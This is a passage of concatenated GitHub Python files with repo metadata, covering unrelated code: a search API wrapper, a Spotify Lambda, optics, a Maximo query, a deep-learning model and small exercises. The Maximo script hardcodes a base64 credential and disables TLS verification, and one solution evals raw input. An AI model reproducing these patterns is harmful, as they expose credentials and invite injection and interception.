experiment\nDA_checks_all['LIM_forecasts']= LIM_forecasts\nif save_stats:\n ofname = 'DA_results_'+file_label+'.npy'\n print('saving DA results here: ',ofname)\n np.save(ofname,DA_checks_all)\n\n\n","repo_name":"modons/GRL2022_LIM_DA","sub_path":"LIM_DA_cycling.py","file_name":"LIM_DA_cycling.py","file_ext":"py","file_size_in_byte":23951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14101916464","text":"from app import config\nimport uuid\nimport requests\nfrom app.routes import sqldb\n\nclass CustomSearch():\n def __init__(self):\n self.api_key = config['GOOGLE_CUSTOM_SEARCH_API_KEY']\n self.engine_id = config['GOOGLE_PROGRAMMABLE_SEACH_ENGINE_ID']\n\n def get_searches(self, query):\n api_url = \"https://www.googleapis.com/customsearch/v1?key={0}&cx={1}\".format(self.api_key, self.engine_id)\n 
search_params = {\n 'q': query,\n 'dateRestrict': \"\",\n 'exactTerms': \"\",\n 'excludeTerms': \"\",\n 'num': 10,\n 'orTerms': \"\",\n 'relatedSite': \"\",\n 'siteSearch': \"\"\n }\n for key in search_params:\n if search_params[key] != '':\n api_url += \"&{0}={1}\".format(key, search_params[key])\n\n r = requests.get(api_url)\n search_items = []\n\n for item in r.json()['items']:\n title = str(item['title']).replace('\\'', '')\n description = str(item['snippet']).replace('\\n', '').replace('\\xa0', '').replace('\\'', '')\n link = str(item['link'])\n domain = str(item['displayLink'])\n id = str(uuid.uuid3(uuid.NAMESPACE_URL, link))\n search_item = {\n 'id': id,\n 'title': title,\n 'description': description,\n 'link': link,\n 'domain': domain\n }\n search_items.append(search_item)\n sqldb.create_source(search_item)\n\n # print(search_items)\n return search_items\n \n","repo_name":"RoyalWeden/codefind","sub_path":"app/customsearch.py","file_name":"customsearch.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27841503489","text":"import boto3\nimport json\nimport os\nimport random\nimport base64\nimport requests\nimport numpy as np\n\ndb_client = boto3.client('dynamodb')\n\nTOTAL_TRACK = int(os.environ['total_track']) # 22480\nclient_creds = os.environ['client_creds'] # from Spotify Application\n\ndef get_user_like(userId):\n response = db_client.get_item(\n Key={\n 'userId': {\n 'S': userId,\n },\n\n },\n TableName='user-like',\n AttributesToGet=['likelist']\n )\n if \"Item\" not in response:\n return \"\"\n like_tids = response[\"Item\"][\"likelist\"][\"S\"]\n return like_tids\n\ndef get_token():\n client_creds_64 = base64.b64encode(client_creds.encode())\n token_data = {\n 'grant_type': 'client_credentials'\n }\n headers = {\n 'Authorization': f'Basic {client_creds_64.decode()}',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n res = requests.post('https://accounts.spotify.com/api/token', data=token_data, headers=headers).json()\n return res['access_token']\n \ndef feature_single_song(track):\n features = np.array([[\n track['acousticness'],\n track['danceability'],\n track['energy'],\n track['instrumentalness'],\n track['key'],\n track['liveness'],\n track['loudness'],\n track['mode'],\n track['speechiness'],\n track['tempo'],\n track['valence'],\n ]])\n return np.round(features, decimals=3)\n \n \ndef year_dist(trackids, api_key):\n url = \"https://api.spotify.com/v1/tracks\"\n url_params = {\n \"ids\": trackids.replace(\" \", \"\")\n }\n headers = {\n 'Authorization': 'Bearer %s' % api_key,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n }\n response = requests.request('GET', url, headers=headers, params=url_params)\n tracks = response.json()[\"tracks\"]\n years = []\n for track in tracks:\n try:\n years.append(int(track[\"album\"][\"release_date\"][:4]))\n except:\n pass\n dist = np.histogram(years, bins=10)\n release = {}\n for i, x in enumerate(dist[0]):\n release[dist[1][i]] = int(x)\n return release\n \ndef get_feature_mtx(trackids, api_key):\n url = \"https://api.spotify.com/v1/audio-features\"\n url_params = {\n \"ids\": trackids.replace(\" \", \"\")\n }\n headers = {\n 'Authorization': 'Bearer %s' % api_key,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n }\n response = requests.request('GET', url, headers=headers, params=url_params)\n tracks = response.json()[\"audio_features\"]\n feature_mtx = 
np.concatenate([feature_single_song(track) for track in tracks], axis=0)\n return feature_mtx\n \ndef analyse(trackids):\n api_key = get_token()\n \n feature_mtx = get_feature_mtx(trackids, api_key)\n years = year_dist(trackids, api_key)\n return feature_mtx.mean(0), years\n\n\ndef lambda_handler(event, context):\n headers = {\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Headers\": \"Content-Type,X-Amz-Date,Authorization,X-Api-Key,X-Amz-Security-Token\",\n \"Access-Control-Allow-Methods\": \"GET,OPTIONS,POST,PUT\"\n }\n\n userId = event[\"pathParameters\"][\"userId\"]\n like_tids = get_user_like(userId)\n # print(like_tids)\n if like_tids == \"\":\n return {\n 'statusCode': 404,\n 'headers': headers,\n 'body': json.dumps({\"message\":\"Report: No enough data to generate report because User's like list is empty\"})\n }\n user_feature, years = analyse(like_tids)\n \n results = {\n \"acousticness\":user_feature[0],\n \"danceability\":user_feature[1],\n \"energy\":user_feature[2],\n \"instrumentalness\":user_feature[3],\n \"key\":user_feature[4],\n \"liveness\":user_feature[5],\n \"loudness\":user_feature[6],\n \"mode\":user_feature[7],\n \"speechiness\":user_feature[8],\n \"tempo\": user_feature[9],\n \"valence\":user_feature[10],\n \"release\": years,\n \"message\":\"fetch report data successfully\"\n }\n \n \n return {\n 'statusCode': 200,\n 'headers': headers,\n 'body': json.dumps(results)\n }\n","repo_name":"zipeijiang/Music-Recommend-Lambda","sub_path":"musicReport/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29651117072","text":"import numpy\n\nfrom rafryshadow3.optical_elements.shadow3_optical_element_decorator import Shadow3OpticalElementDecorator\nfrom rafryshadow3.util.shadow3_util import check_file_name, init_file_name\nfrom syned.beamline.shape import BoundaryShape, Rectangle, Ellipse\nfrom syned.beamline.element_coordinates import ElementCoordinates\n\nfrom Shadow import OE\n\nclass Shadow3Absorber(Shadow3OpticalElementDecorator):\n\n def __init__(self, absorber_parameters):\n Shadow3OpticalElementDecorator.__init__(self, absorber_parameters)\n\n def _build_shadow3_oe(self, additional_parameters):\n shadow3_oe=OE()\n\n shadow3_oe.DUMMY=100\n\n shadow3_oe.FMIRR=5\n shadow3_oe.F_CRYSTAL=0\n shadow3_oe.F_REFRAC=2\n shadow3_oe.F_SCREEN=1\n shadow3_oe.N_SCREEN=1\n\n i_screen = numpy.zeros(10) # after\n i_abs = numpy.zeros(10)\n i_slit = numpy.zeros(10)\n i_stop = numpy.zeros(10)\n k_slit = numpy.zeros(10)\n thick = numpy.zeros(10)\n file_abs = ['', '', '', '', '', '', '', '', '', '']\n rx_slit = numpy.zeros(10)\n rz_slit = numpy.zeros(10)\n sl_dis = numpy.zeros(10)\n file_scr_ext = ['', '', '', '', '', '', '', '', '', '']\n cx_slit = numpy.zeros(10)\n cz_slit = numpy.zeros(10)\n\n i_abs[0] = additional_parameters.I_ABS\n i_slit[0] = additional_parameters.I_SLIT\n\n if additional_parameters.I_SLIT == 1:\n i_stop[0] = additional_parameters.I_STOP\n\n if self._boundary_shape is None:\n k_slit[0] = 2\n file_scr_ext[0] = check_file_name(additional_parameters.FILE_SCR_EXT)\n else:\n if isinstance(self._boundary_shape, Rectangle):\n k_slit[0] = 0\n elif isinstance(self._boundary_shape, Ellipse):\n k_slit[0] = 1\n\n x_min, x_max, z_min, z_max = self._boundary_shape.get_boundaries()\n\n rx_slit[0] = abs(x_max - x_min)\n rz_slit[0] = abs(z_max - z_min)\n cx_slit[0] = 0.5*(x_max + x_min)\n cz_slit[0] = 0.5*(z_max + 
z_min)\n\n if additional_parameters.I_ABS == 1:\n thick[0] = additional_parameters.THICK\n file_abs[0] = check_file_name(additional_parameters.FILE_ABS)\n\n shadow3_oe.set_screens(1,\n i_screen,\n i_abs,\n sl_dis,\n i_slit,\n i_stop,\n k_slit,\n thick,\n numpy.array(file_abs),\n rx_slit,\n rz_slit,\n cx_slit,\n cz_slit,\n numpy.array(file_scr_ext))\n\n return shadow3_oe\n\n def _set_coordinates(self, element_coordinates=ElementCoordinates()):\n self._shadow3_oe.T_SOURCE = element_coordinates.p()\n self._shadow3_oe.T_IMAGE = element_coordinates.q()\n self._shadow3_oe.T_INCIDENCE = 0.0\n self._shadow3_oe.T_REFLECTION = 180.0\n self._shadow3_oe.ALPHA = 0.0","repo_name":"oasys-kit/rafryshadow3","sub_path":"rafryshadow3/optical_elements/absorbers/shadow3_absorber.py","file_name":"shadow3_absorber.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29314275439","text":"import requests\r\nimport json\r\nimport csv\r\nimport os\r\nimport shutil\r\nfrom pprint import pprint\r\n\r\n#work order to test it 15706973\r\nworkordernum = input(\"Enter a workorder:\")\r\n\r\n# connects to maximo server to make api calls\r\napi_url = \"http://ocudrhmxdvap01/maxrest/rest/os/mxwo?\"\r\n\r\n# Build query URL\r\nquery_url = f\"{api_url}wonum={workordernum}\"\r\n# setting the headers for the request to be made.\r\nheaders = {\r\n 'Content-Type': \"application/json\",\r\n # the authorization is username:password in base64\r\n # use https://www.base64encode.org/ to format the username and password to base64\r\n 'MAXAUTH': \"MTM2MDQ4Om1heGltbw==\",\r\n 'cache-control': \"no-cache\"\r\n}\r\n\r\n# Set the query parameters for the API request.\r\nparams = {\r\n '_format': 'json',\r\n 'compact': 1,\r\n 'workorder': '~sw~%s' % workordernum\r\n}\r\n\r\n# Make API request\r\ntry:\r\n response = requests.get(query_url, headers=headers, params=params, verify=False)\r\n #print(response.json)\r\nexcept requests.exceptions.RequestException as e:\r\n # An error occurred while making the request\r\n print(f\"An error occurred while making the request: {e}\")\r\n ourdata = []\r\nelse:\r\n # Check the status code of the response\r\n if response.status_code != 200:\r\n # The request failed\r\n print(f\"The request failed with status code {response.status_code}\")\r\n ourdata = []\r\n else:\r\n # Parse response\r\n try:\r\n data = response.json()\r\n #pprint(data)\r\n # build a list (not a generator) so the rows can be written out and counted later\r\n ourdata = [(item[\"Attributes\"][\"workorder\"][\"content\"], item[\"Attributes\"][\"DESCRIPTION\"][\"content\"]) for item in data['QueryMXWOResponse'][\"MXWOSet\"][\"WORKORDER\"]]\r\n print(ourdata)\r\n except json.decoder.JSONDecodeError as e:\r\n # An error occurred while parsing the response\r\n print(f\"An error occurred while parsing the response: {e}\")\r\n ourdata = []\r\n\r\n\r\n# Set the header row for the CSV file\r\ncsvheader = ['Attributes', 'WORKORDER', 'content']\r\n\r\n# Define the path for the CSV file\r\npath = 'C:/Users/136048/Desktop/dev/%s_workorder.csv' % workordernum\r\n\r\n\r\n# Define the destination for the copied file\r\n# Path can be changed to a different destination just incase dev folder is corrupted.\r\ncopy_name = 'C:/Users/136048/Desktop/dev/%s_workorder.csv' % workordernum\r\n\r\n# Check if the path exists\r\nif os.path.exists(path):\r\n # Copy the CSV file to a new location (skipped when source and destination are the same file)\r\n if copy_name != path:\r\n shutil.copy(path, copy_name)\r\nelse:\r\n print(\"The file does not exist at the specified path.\")\r\n\r\n# Open a CSV file for writing\r\nwith open(path, 
'w', encoding='UTF8', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow(csvheader) #writes the csv headers such as ['Attributes', 'LOCATION', 'content']\r\n writer.writerows(ourdata) # writes the data that is being extracted from the json file.\r\n\r\n# Close the CSV file to make sure file doesn't get corrupted or get extra values inputted.\r\nfile.close()\r\n\r\n# Copy the CSV file to a new location (skipped when source and destination are the same file)\r\ncopy_name = path\r\nif copy_name != path and os.path.exists(path):\r\n shutil.copy(path, copy_name)\r\n\r\nprint(f\"Successfully wrote {len(ourdata)} work orders to 'workorders.csv'.\")\r\n\r\n","repo_name":"LuckyStraight/Maximo-API-and-Query","sub_path":"workorderQuery.py","file_name":"workorderQuery.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72223283561","text":"import torch\nfrom torch import nn\nfrom PhysNet.PhysNet_Layer import physnet\nfrom Denoise_Graph import denoise_graph\nfrom HR_Cal import hr_cal\n\n\nclass Model_PhysNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.opt = OptInit()\n self.model_physnet = physnet()\n self.model_wave_graph = denoise_graph(self.opt)\n self.model_hr_cal = hr_cal(self.opt)\n\n # Initialize weights\n self.init_weights()\n\n @torch.no_grad()\n def init_weights(self):\n def _init(m):\n if isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n if hasattr(m, 'bias') and m.bias is not None:\n nn.init.normal_(m.bias, std=1e-6) # nn.init.constant(m.bias, 0)\n\n self.apply(_init)\n\n def forward(self, x): # [B, 3, 160, 128, 128]\n wave = self.model_physnet(x) # [B, 3, 160, 8, 8]\n ecg = self.model_wave_graph(wave)\n\n hr, hr_class = self.model_hr_cal(ecg)\n return ecg, hr, hr_class\n\n def __str__(self):\n str = self.opt.__str__() + \"\\n\"\n str = str + self.model_physnet.__str__() + \"\\n\"\n str = str + self.model_wave_graph.__str__() + \"\\n\"\n str = str + self.model_hr_cal.__str__() + \"\\n\"\n return str\n\n def save_model(self, log):\n torch.save(self.state_dict(), log + '/' + 'model_hr_best.pkl')\n torch.save(self.model_physnet.state_dict(), log + '/' + 'model_physnet.pkl')\n torch.save(self.model_wave_graph.state_dict(), log + '/' + 'model_wave_graph_best.pkl')\n torch.save(self.model_hr_cal.state_dict(), log + '/' + 'model_hr_cal_best.pkl')\n\n\nclass OptInit:\n def __init__(self):\n # Wave Graph\n self.wave_gnn_k = 18 # neighbor num (default:18)\n self.wave_gnn_conv = 'avg_relative_conv' # graph conv layer {edge, sage, gin, mr, avg_relative_conv}\n self.wave_gnn_act = 'gelu' # activation layer {relu, prelu, leakyrelu, gelu, hswish}\n self.wave_gnn_norm = 'batch' # batch or instance normalization {batch, instance}\n self.wave_gnn_bias = True # bias of conv layer True or False\n self.wave_gnn_epsilon = 0.2 # stochastic epsilon for gcn\n self.wave_gnn_use_stochastic = False # stochastic for gcn, True or False\n self.wave_gnn_drop_path = 0.0\n self.wave_gnn_blocks = [1, 1] # number of basic blocks in the backbone\n self.wave_last_dim = 4096\n self.wave_channels = [768, 192, 96, 24, 1] # number of channels of deep features\n\n # HRcal\n self.hr_cal_class_channle = [160, 280]\n self.hr_cal_class_act = 'gelu'\n self.hr_cal_class_dropout_rate = [0.25]\n self.hr_cal_out_class = 140\n\n def __str__(self):\n attrs = vars(self)\n return ', '.join(\"%s: %s\" % item for item in 
attrs.items())\n","repo_name":"Xiong-JiaHao/GraphPhys","sub_path":"Model_PhysNet.py","file_name":"Model_PhysNet.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8950717031","text":"dict = {'@' : ' * 3', '%' : ' + 5', '#' : ' - 7' }\nT = int(input())\nfor i in range(T):\n string = ''\n answer = 0\n for char in input().split():\n if (char == '@') or (char == '%') or (char == '#'):\n answer = eval(string + dict[char])\n else:\n answer = eval(string + char)\n string = str(answer)\n print(\"%.2f\"%(answer))\n","repo_name":"dlwnsgud8406/mysolved","sub_path":"baekjoon/bronze2/5355.py","file_name":"5355.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5746679627","text":"\"\"\"\nThe parsers agent provides an interface for the server to construct messages that can be sent to the parsers over the MQ.\nIt should provide only `construct_parsers_message` as its interface.\n\"\"\"\n\nimport numpy as np\n\nfrom brain import data_path\nfrom brain.autogen import server_parsers_pb2, client_server_pb2\nfrom brain.utils.common import normalize_path, get_logger\n\nlogger = get_logger(__name__)\n\n\ndef copy_protobuf(item_a, item_b, attrs):\n for attr in attrs:\n setattr(item_a, attr, getattr(item_b, attr))\n\n\ndef handle_color_image(snapshot, data):\n # save color image blob as raw file to disk\n path = normalize_path(snapshot.path)\n image_file = str(path / 'color_image.raw')\n with open(image_file, 'wb') as writer:\n writer.write(data)\n snapshot.color_image.file_name = image_file\n\n\ndef handle_depth_image(snapshot, data):\n # save depth image blob as raw file to disk\n path = normalize_path(snapshot.path)\n image_file = 'depth_image.raw'\n image_file_path = str(path / image_file)\n array = np.array(data).astype(np.float)\n np.save(image_file_path, array)\n snapshot.depth_image.file_name = image_file + '.npy'\n\n\ndef construct_parsers_message(snapshot: client_server_pb2.Snapshot, snapshot_uuid: int) -> server_parsers_pb2.Snapshot:\n \"\"\"\n Construct a message to the parsers.\n\n The main change being done at this point, is to save blobs such as color and depth image to the disk,\n and provide a path to the file on disk instead of the actual data being stored as part of the message so far.\n\n :param snapshot: snapshot in client_server_pb2.Snapshot format.\n :param snapshot_uuid: uuid of the snapshot.\n :return: the constructed message in server_parsers_pb2.Snapshot format.\n \"\"\"\n\n logger.debug(f'constructing message for parsers')\n parsers_snapshot = server_parsers_pb2.Snapshot()\n parsers_snapshot.uuid = snapshot_uuid\n copy_protobuf(parsers_snapshot, snapshot, ['datetime'])\n copy_protobuf(parsers_snapshot.user, snapshot.user, ['user_id', 'username', 'birthday', 'gender'])\n copy_protobuf(parsers_snapshot.pose.translation, snapshot.pose.translation, ['x', 'y', 'z'])\n copy_protobuf(parsers_snapshot.pose.rotation, snapshot.pose.rotation, ['x', 'y', 'z', 'w'])\n copy_protobuf(parsers_snapshot.color_image, snapshot.color_image, ['width', 'height'])\n copy_protobuf(parsers_snapshot.depth_image, snapshot.depth_image, ['width', 'height'])\n copy_protobuf(parsers_snapshot.feelings, snapshot.feelings, ['hunger', 'thirst', 'exhaustion', 'happiness'])\n\n # before saving blobs to the disk, we must find a directory to save files to.\n # we will use the /// directory (and create it if not exists).\n 
base_path = data_path\n user_id = parsers_snapshot.user.user_id\n user_dir = base_path / str(user_id)\n if not user_dir.exists():\n user_dir.mkdir()\n snapshot_dir = user_dir / str(parsers_snapshot.uuid)\n if not snapshot_dir.exists():\n snapshot_dir.mkdir()\n\n # provide base path as part of the message, and certain results will contains file name.\n parsers_snapshot.path = str(snapshot_dir)\n\n if parsers_snapshot.color_image:\n handle_color_image(parsers_snapshot, snapshot.color_image.data)\n if parsers_snapshot.depth_image:\n handle_depth_image(parsers_snapshot, snapshot.depth_image.data)\n return parsers_snapshot\n","repo_name":"ntalmon/brain","sub_path":"brain/server/parsers_agent.py","file_name":"parsers_agent.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12162749194","text":"from maya.api import OpenMaya\nfrom maya import cmds\n\nfrom caffeine.logs import getActionLogger\nfrom caffeine import steps\n\n\nLOG = getActionLogger('createJoint')\n\n\ndef build(ctx):\n obj = OpenMaya.MFnDependencyNode().create('joint', name=ctx['name'])\n\n return steps.StepResponse.fromDict({\n 'status': 200,\n 'node': obj,\n 'name': OpenMaya.MFnDependencyNode(obj).name()\n })\n\n\ndef save(ctx, response):\n n = response['node']\n nodeName = OpenMaya.MFnDagNode(n).fullPathName()\n ctx['name'] = nodeName.split('|')[-1]\n \n pos = cmds.xform(nodeName, q=True, ws=True, t=True)\n ctx['position'] = pos\n\n rot = cmds.xform(nodeName, q=True, ws=True, ro=True)\n ctx['orient'] = rot\n\n ctx['ssc'] = cmds.getAttr('{0}.ssc'.format(nodeName))\n ","repo_name":"ricksilliker/caffeine","sub_path":"src/caffeine_maya/defaultSteps/createJoint.step/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26598381500","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\ntesty\r\n\"\"\"\r\n\r\nfrom nghh import *\r\nimport unittest\r\n\r\n\r\nclass MyTestCase(unittest.TestCase):\r\n def test_1(self):\r\n m = \"abc\"\r\n our = SHA_512_256(m)\r\n \r\n official = 0x53048E2681941EF99B2E29B76B4C7DABE4C2D0C634FC6D46E0E2F13107E7AF23\r\n self.assertEqual(our, official)\r\n self.assertEqual(hex(our), hex(official))\r\n \r\n def test_2(self):\r\n m = \"abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmnhijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu\"\r\n our = SHA_512_256(m)\r\n official = 0x3928E184FB8690F840DA3988121D31BE65CB9D3EF83EE6146FEAC861E19B563A\r\n self.assertEqual(our, official)\r\n self.assertEqual(hex(our), hex(official))\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"Heightweight/crypto_project","sub_path":"signature/testy.py","file_name":"testy.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74399909161","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) <= 1:\n return 0\n \n buy = prices[0]\n profit = 0\n prices = prices[1:]\n for sell in prices:\n if buy > sell:\n buy = sell\n elif sell - buy > profit:\n profit = sell - buy\n \n \n return profit\n","repo_name":"Ashrockzzz2003/LeetCode_Solutions","sub_path":"121.py","file_name":"121.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"42971061025","text":"import vsketch\n\nimport math\n\nimport numpy as np\nfrom shapely.geometry import *\nfrom shapely.affinity import *\nfrom shapely.ops import *\n\n\nclass S008Sketch(vsketch.SketchClass):\n dual = vsketch.Param(True)\n\n def flow(self, freq: float, thick: float, rounding: float) -> MultiLineString:\n vsk = self.vsk\n\n ampl = vsk.random(0.1, 0.3)\n\n counts = {}\n lines = []\n for y0 in np.arange(0, 18, thick):\n for x0 in np.arange(0, 15, thick):\n line = [(x0, y0)]\n for _ in range(100):\n x, y = line[-1]\n xt, yt = x / 15, y / 18\n a = vsk.noise(xt * freq, yt * freq) * math.tau\n a = math.radians(math.degrees(a) // rounding * rounding)\n x += math.cos(a) * ampl\n y += math.sin(a) * ampl\n\n k = int(round(x * 10)), int(round(y * 10))\n c = counts.get(k, 0)\n if c < 2:\n counts[k] = c + 1\n else:\n break\n\n if 0 <= x <= 15 and 0 <= y <= 18:\n line.append((x, y))\n else:\n break\n\n if len(line) > 1:\n lines.append(line)\n\n return MultiLineString(lines)\n\n def draw(self, vsk: vsketch.Vsketch) -> None:\n vsk.size(\"a5\", landscape=False)\n vsk.scale(\"cm\")\n\n freq = vsk.random(7, 10)\n rounding = int(vsk.random(1, 9) * 10)\n\n lines1 = self.flow(freq, 0.80, rounding)\n lines2 = self.flow(freq, 0.25, rounding)\n\n subject = Point(6.5, 9).buffer(5)\n\n if self.dual:\n container = box(0, 0, 13, 18)\n\n t = vsk.random(0.2, 0.8)\n container_left = Polygon(\n [(0, 0), (vsk.lerp(0, 13, t), 0), (vsk.lerp(0, 13, 1 - t), 18), (0, 18)]\n )\n container_right = Polygon(\n [\n (vsk.lerp(0, 13, t), 0),\n (13, 0),\n (13, 18),\n (vsk.lerp(0, 13, 1 - t), 18),\n ]\n )\n\n vsk.geometry(container)\n\n lines = [\n (lines1 & container, container_left, True),\n (lines2 & container, container_left, False),\n (lines1 & container, container_right, False),\n (lines2 & container, container_right, True),\n ]\n\n for lc, cont, subj_shading in lines:\n for l in lc.geoms:\n ll = []\n for x, y in l.coords:\n if vsk.random(1) > 0.3 and (\n not cont.contains(Point(x, y))\n or subj_shading != subject.contains(Point(x, y))\n ):\n if ll:\n vsk.polygon(ll)\n ll.clear()\n continue\n ll.append((x, y))\n if ll:\n vsk.polygon(ll)\n else:\n container = box(0, 0, 13, 18)\n vsk.geometry(container)\n vsk.geometry((lines1 - subject) & container)\n\n vsk.geometry((lines2 & subject) & container)\n\n def finalize(self, vsk: vsketch.Vsketch) -> None:\n vsk.vpype(\"color black linemerge linesimplify reloop linesort\")\n\n\nif __name__ == \"__main__\":\n S008Sketch.display()\n","repo_name":"d-dorazio/pus","sub_path":"s008/sketch_s008.py","file_name":"sketch_s008.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"6425953046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n#import math\nimport math\n\n#initiate valuable\ndegreeList = []\nsinList = []\ncosList = []\nsin = 0\ncos = 0\n\n#create lists of degree, sin, and cos\nfor i in range(0, 37):\n degreeList.append(i * 10)\n \n sin = math.sin(math.radians(degreeList[i]))\n sinList.append(round(sin, 4))\n \n cos = math.cos(math.radians(degreeList[i]))\n cosList.append(round(cos, 4))\n\n#define function to print degree, sin, and cos\ndef desplay(degree, sin, cos):\n print(format(degree, \"<10.4f\"), format(sin, \"<10.4f\"), format(cos, \"<10.4f\"))\n\n#print columns name\nprint(format(\"Degree\", \"<10s\"), format(\"Sin\", \"<10s\"), format(\"Cos\", \"<10s\"), \"\\n\")\n\n#print degrees, sins, and coses\nfor 
i in range(0, 37):\n desplay(degreeList[i], sinList[i], cosList[i])\n ","repo_name":"ShinsakuOkazaki/PythonPractice","sub_path":"assign5.7.py","file_name":"assign5.7.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14753291901","text":"from functions import get_difference_percent\nfrom volatility.volatility_telegram_sender import send_telegram_message\n\ncoins = []\n\n\ndef set_coins(new_coins):\n global coins\n coins = new_coins\n\n\ndef get_coins():\n return coins\n\n\ndef check_changes(new_coins):\n if len(get_coins()):\n for new_coin in new_coins:\n for coin in get_coins():\n if coin['symbol'] == new_coin['symbol']:\n price_change_percent = get_difference_percent(coin['price'], new_coin['price'])\n if abs(price_change_percent) > 5:\n send_telegram_message(new_coin, price_change_percent)\n\n set_coins(new_coins)\n","repo_name":"elfarych/bitman-trader","sub_path":"Python-screener/volatility/volatility.py","file_name":"volatility.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27838008823","text":"\nimport asyncio\nimport pyrogram\nfrom pyrogram import Client, filters\nfrom driver.filters import command\nfrom pyrogram.types import Message\nfrom pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton\nfrom config import (\n BOT_NAME,\n BOT_PHOTO,\n)\n\n\n\n@Client.on_message(filters.command(BOT_NAME))\ndef reply_to_timo(Client, message):\n message.reply_text(\n f\"\"\"**╪з┘К ┘В┘Д╪и┘К ЁЯдНЁЯШ╗**\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"Tсе▒сегсе▒ъкФсе▒ъкО MсеЩсеЙсОесе┤\", url=f\"https://t.me/source_telemex\"),\n ]\n ]\n )\n )\n \n \n \n@Client.on_message(command([\"╪и┘И╪к\", \"┘И╪к\"]) & ~filters.edited)\nasync def nammes(client: Client, message: Message):\n usr = await client.get_users(message.from_user.id)\n name = usr.first_name\n await message.reply_photo(\n photo=f\"{BOT_PHOTO}\",\n caption=f\"\"\"╪з╪│┘Е┘К {BOT_NAME} ╪з┘Д┘Г┘К┘И╪к ЁЯМЭтЩея╕П\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n name, url=f\"https://t.me/{message.from_user.username}\")\n ],\n [\n InlineKeyboardButton(\"╪з╪╡┘Ж╪╣ ╪и┘И╪к┘Г\", url=f\"https://t.me/source_Telemex\"),\n ], \n ]\n ),\n )\n \n\n \n","repo_name":"Music-euro/TELEMEX_MUSIC","sub_path":"program/namebot.py","file_name":"namebot.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73442525481","text":"\"\"\"\nThis script predicts recommendations using a turicreate model.\n\"\"\"\n\nimport pandas as pd\nimport turicreate as tc\n\n# utility function to load the model\ndef load_model(model_dir):\n model = tc.load_model(model_dir)\n return model\n\n# Loading the model\nmodel = load_model('movie_recs.model')\n\n# Defining a new user with their ratings\ndef create_new_user_ratings(movieIds: list, ratings: list, userIds: list):\n new_user_ratings = tc.SFrame({\n 'movieId': movieIds,\n 'rating': ratings,\n 'userId': userIds\n })\n return new_user_ratings\n\n# Creating a new user with their ratings\nnew_user_ratings = create_new_user_ratings(\n movieIds=[1073, 919, 1097], \n ratings=[5, 5, 5], \n userIds=[5000000, 5000000, 5000000]\n)\n\n# Making recommendations\nrecommendations = model.recommend([5000000], new_observation_data=new_user_ratings)\n\n# Converting the 
recommendations to a list\nlist_of_recommandations = list(recommendations['movieId'])\n\n# A function to convert the list of recommendations to their corresponding titles\ndef convertRecommendationsToTitle(list_of_recommandations):\n df = pd.read_csv('../input/movie.csv')\n df = df[['movieId', 'title', 'genres']]\n df = df.set_index('movieId')\n df = df.loc[list_of_recommandations]\n return df\n\n# Converting the recommendations to their corresponding titles\ndf = convertRecommendationsToTitle(list_of_recommandations)\n\n# Printing the top 10 recommendation's titles\nprint(df.head(10))","repo_name":"aryankhatana01/cf-recsys","sub_path":"turimodel/predictRecommendations.py","file_name":"predictRecommendations.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"13621076375","text":"class BinaryTree:\n\n def __init__(self, root_node = None):\n # Check out Use Me section to find out Node 